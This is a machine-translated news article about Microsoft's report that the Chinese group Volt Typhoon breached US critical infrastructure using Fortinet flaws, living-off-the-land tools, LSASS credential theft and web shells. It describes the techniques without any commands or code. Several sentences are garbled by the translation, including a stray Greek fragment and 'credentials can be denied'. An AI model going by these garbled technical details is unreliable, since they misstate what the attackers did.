Microsoft: Chinese hackers (Volt Typhoon) breach US infrastructure

According to Microsoft, the Chinese team The cyber threat it's tracking, dubbed Volt Typhoon, is targeting critical infrastructure organizations across the US, including Guam, at least through mid-2021.

chinese hacker

Its victims include a wide range of critical sectors such as government, shipping, telecommunications, manufacturing, IT, utilities, , construction and education.

The first attack vector is to compromise Fortinet FortiGuard devices exposed to the internet by exploiting an unknown 0day vulnerability.

Once the target's network is compromised, they can use hands-on activities with it and PowerShell, Certutil, Netsh, Windows Management Instrumentation Command Line (WMIC), etc. Live off-the-land binaries (LOLBin) to launch what Microsoft describes as “living off-the-land” attacks.

However, according to a joint advisory released today by the FBI, NSA, CISA and the Australian, New Zealand, UK and Canadian cyber security agencies, they have identified Fast Reverse Proxy (frp), the tool ς διαπιστευτηρίων , the Impacket network and frameworks, and other open source tools have also been observed.

Volt Typhoon combines malicious activity with legitimate network traffic to avoid detection, such as ASUS, Cisco, D-Link, Netgear, FatPipe and Zyxel routers, firewalls and VPN in hacked small offices and home office (SOHO).

Using the privileged access gained after a Fortinet device is compromised, govt credentials can be denied through the Local Security Authority Subsystem Service (LSASS).

Stolen credentials allow them to deploy one Awen-based shell to extract and preserve data on the compromised system.

china hackers

As Mandiant Intelligence chief analyst John Hultquist said, these intrusions into US critical infrastructure organizations are a concerted effort to give China the advantage in the event of a future conflict between the two countries. It appears to be part of a concerted effort to give access to China in the event of a future conflict between the two countries.

"There are many reasons for targeting critical infrastructure, but an unrelenting focus on these areas may indicate preparations for disruptive or destructive cyber attacks," said Hultquist.

States conduct long-term incursions into critical infrastructure to prepare for potential conflicts. Similar intrusions of necessity are regularly carried out by the states.

Over the past decade, Russia has targeted several critical infrastructure sites in operations that would not be considered rapid launch operations. China has similarly targeted the oil and gas sector in the past. While these operations are aggressive and potentially dangerous, they do not necessarily indicate that an attack is imminent."

Microsoft said it followed its normal procedures and proactively contacted all customers targeted or compromised in these attacks, providing them with the information they needed to protect their networks from future breach attempts.

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.100 registrants.
Volt Typhoon, Microsoft

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).